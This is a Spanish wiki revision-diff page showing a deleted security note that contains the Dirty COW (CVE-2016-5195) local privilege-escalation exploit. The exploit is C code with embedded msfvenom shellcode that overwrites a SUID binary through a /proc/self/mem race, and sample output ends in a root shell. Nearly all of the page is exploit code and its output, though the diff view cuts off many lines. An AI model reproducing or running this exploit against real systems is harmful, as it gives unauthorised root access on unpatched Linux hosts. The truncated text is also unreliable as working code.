notas:seguridad:exploits:dirty_cow
Diferencias
Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anteriorRevisión previa | |||
notas:seguridad:exploits:dirty_cow [2016/11/03 20:12] – cayu | notas:seguridad:exploits:dirty_cow [Fecha desconocida] (actual) – borrado - editor externo (Fecha desconocida) 127.0.0.1 | ||
---|---|---|---|
Línea 1: | Línea 1: | ||
- | ====== Dirty COW ====== | ||
- | **CVE-2016-5195** https:// | ||
- | |||
- | <code cpp> | ||
- | /* | ||
- | * (un)comment correct payload first (x86 or x64)! | ||
- | * | ||
- | * $ gcc cowroot.c -o cowroot -pthread | ||
- | * $ ./cowroot | ||
- | * DirtyCow root privilege escalation | ||
- | * Backing up / | ||
- | * Size of binary: 57048 | ||
- | * Racing, this may take a while.. | ||
- | * / | ||
- | * Popping root shell. | ||
- | * Don't forget to restore /tmp/bak | ||
- | * thread stopped | ||
- | * thread stopped | ||
- | * root@box:/ | ||
- | * uid=0(root) gid=1000(foo) groups=1000(foo) | ||
- | */ | ||
- | |||
- | #include < | ||
- | #include < | ||
- | #include < | ||
- | #include < | ||
- | #include < | ||
- | #include < | ||
- | #include < | ||
- | |||
- | void *map; | ||
- | int f; | ||
- | int stop = 0; | ||
- | struct stat st; | ||
- | char *name; | ||
- | pthread_t pth1, | ||
- | |||
- | // change if no permissions to read | ||
- | char suid_binary[] = "/ | ||
- | |||
- | /* | ||
- | * $ msfvenom -p linux/ | ||
- | */ | ||
- | unsigned char sc[] = { | ||
- | 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, | ||
- | 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, | ||
- | 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | ||
- | 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, | ||
- | 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, | ||
- | 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, | ||
- | 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, | ||
- | 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 | ||
- | }; | ||
- | unsigned int sc_len = 177; | ||
- | |||
- | /* | ||
- | * $ msfvenom -p linux/ | ||
- | unsigned char sc[] = { | ||
- | 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, | ||
- | 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | ||
- | 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, | ||
- | 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, | ||
- | 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, | ||
- | 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, | ||
- | 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, | ||
- | 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, | ||
- | 0x89, 0xe1, 0xcd, 0x80 | ||
- | }; | ||
- | unsigned int sc_len = 136; | ||
- | */ | ||
- | |||
- | void *madviseThread(void *arg) | ||
- | { | ||
- | char *str; | ||
- | str=(char*)arg; | ||
- | int i,c=0; | ||
- | for(i=0; | ||
- | c+=madvise(map, | ||
- | } | ||
- | printf(" | ||
- | } | ||
- | |||
- | void *procselfmemThread(void *arg) | ||
- | { | ||
- | char *str; | ||
- | str=(char*)arg; | ||
- | int f=open("/ | ||
- | int i,c=0; | ||
- | for(i=0; | ||
- | lseek(f, | ||
- | c+=write(f, str, sc_len); | ||
- | } | ||
- | printf(" | ||
- | } | ||
- | |||
- | void *waitForWrite(void *arg) { | ||
- | char buf[sc_len]; | ||
- | |||
- | for(;;) { | ||
- | FILE *fp = fopen(suid_binary, | ||
- | |||
- | fread(buf, sc_len, 1, fp); | ||
- | |||
- | if(memcmp(buf, | ||
- | printf(" | ||
- | break; | ||
- | } | ||
- | |||
- | fclose(fp); | ||
- | sleep(1); | ||
- | } | ||
- | |||
- | stop = 1; | ||
- | |||
- | printf(" | ||
- | printf(" | ||
- | |||
- | system(suid_binary); | ||
- | } | ||
- | |||
- | int main(int argc,char *argv[]) { | ||
- | char *backup; | ||
- | |||
- | printf(" | ||
- | printf(" | ||
- | |||
- | asprintf(& | ||
- | system(backup); | ||
- | |||
- | f = open(suid_binary, | ||
- | fstat(f,& | ||
- | |||
- | printf(" | ||
- | |||
- | char payload[st.st_size]; | ||
- | memset(payload, | ||
- | memcpy(payload, | ||
- | |||
- | map = mmap(NULL, | ||
- | |||
- | printf(" | ||
- | |||
- | pthread_create(& | ||
- | pthread_create(& | ||
- | pthread_create(& | ||
- | |||
- | pthread_join(pth3, | ||
- | |||
- | return 0; | ||
- | } | ||
- | </ | ||
- | |||
- | * https:// | ||
- | |||
- | * https:// | ||
- | * http:// | ||
- | |||
- | * https:// | ||
notas/seguridad/exploits/dirty_cow.1478203976.txt.gz · Última modificación: 2016/11/03 20:12 por cayu